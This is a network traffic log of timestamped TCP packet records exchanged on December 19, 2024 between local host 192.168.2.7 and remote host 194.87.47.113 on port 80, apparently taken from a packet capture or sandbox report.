Dec 19, 2024 08:47:24.064501047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.064568043 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.065399885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.065555096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.065603018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.066528082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.066606998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.066679955 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.067624092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.067775011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.067833900 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.068720102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.069021940 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.069123983 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.069868088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.070000887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.070055962 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.070868015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.071110010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.071161032 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.072014093 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.072174072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.072247028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.073359966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.073688030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.073836088 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.074227095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.074381113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.074534893 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.075295925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.075506926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.075628042 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.076491117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.076598883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.076685905 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.077686071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.077760935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.077991009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.078782082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.079101086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.079242945 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.079679012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.079864025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.079931974 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.080965042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.081084013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.081176996 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.081876993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.082351923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.082519054 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.083023071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.083225012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.083343983 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.084098101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.084323883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.084536076 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.085228920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.085402012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.085519075 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.086266994 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.086478949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.086535931 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.087373972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.087577105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.087645054 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.088563919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.088953018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.089015007 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.089627981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.089807987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.089899063 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.090709925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.090948105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.090990067 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.091943979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.092021942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.092120886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.093019962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.093121052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.093173981 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.093957901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.137783051 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.152841091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.153024912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.153276920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.153347969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.164529085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.164691925 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.164706945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.165088892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.165138006 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.165391922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.166151047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.166237116 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.166327953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.167186975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.167239904 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.167443991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.168394089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.168488026 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.168567896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.169390917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.169486046 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.169610977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.170526028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.170593023 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.236140013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.236263037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.236637115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.236876965 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.237093925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.237174988 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.237749100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.238004923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.238082886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.238859892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.239094973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.239301920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.239943981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.240473032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.240595102 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.241051912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.241417885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.241506100 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.242167950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.242494106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.242571115 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.243345022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.243784904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.243841887 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.244390011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.244535923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.244775057 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.245441914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.245717049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.245769024 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.246531010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.246788025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.246943951 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.247693062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.247853994 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.247941017 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.248840094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.248930931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.249478102 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.249881029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.250058889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.250901937 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.250966072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.251188993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.251247883 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.252111912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.252434969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.252523899 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.253189087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.253752947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.253796101 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.254276037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.254584074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.254719019 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.255604982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.255728960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.255892038 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.256618977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.256891012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.256967068 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.257586002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.257931948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.258023024 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.258738041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.259111881 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.259171009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.259819984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.260159969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.260211945 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.260958910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.261136055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.261231899 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.261991978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.262207985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.262312889 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.263227940 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.263521910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.263700008 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.264384985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.264586926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.264652014 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.265309095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.265538931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.265866995 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.266427040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.266644955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.266748905 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.267503977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.267729044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.267791986 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.268673897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.268866062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.268928051 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.269721031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.269963980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.270186901 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.270865917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.271132946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.271338940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.271958113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.272146940 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.272233009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.273030043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.273303986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.273363113 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.274099112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.274343014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.274430990 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.275342941 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.275533915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.275614023 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.276199102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.276412010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.277005911 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.277024031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.277199030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.277311087 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.277816057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.278024912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.278111935 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.278853893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.278918982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.278997898 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.279798031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.279809952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.279856920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.280437946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.325381994 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.406656981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.406886101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.407094002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.407135010 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.413806915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.413925886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.414098978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.414285898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.414424896 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.414444923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.414809942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.414866924 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.415234089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.415514946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.415561914 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.416106939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.416312933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.416357994 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.417049885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.417216063 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.417449951 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.417820930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.418061018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.418121099 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.418881893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.418972015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.419111967 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.419564962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.419867992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.419980049 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.420437098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.420619011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.420694113 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.421416998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.421489954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.421575069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.428333044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.428407907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.428468943 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.428767920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.429414988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.429914951 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.429944038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.429964066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.430006981 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.430753946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.430767059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.430979013 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.431503057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.431854963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.432130098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.432913065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.433020115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.433114052 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.433445930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.433715105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.433993101 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.434058905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.434196949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.434386015 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.434788942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.434854984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.434900999 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.435560942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.435863018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.435916901 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.436419010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.436624050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.436731100 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.437287092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.437469959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.437552929 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.438369036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.438551903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.438755989 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.438967943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.439359903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.439493895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.439842939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.440119982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.440220118 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.440753937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.440941095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.441080093 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.441560984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.441988945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.442059994 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.442425966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.442739010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.443308115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.443372965 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.443520069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.444140911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.444190025 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.444380999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.444525003 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.445425034 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.445427895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.445590019 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.445943117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.446075916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.446197987 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.446780920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.447019100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.447076082 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.447873116 CET	80	49707	194.87.47.113	192.168.2.7
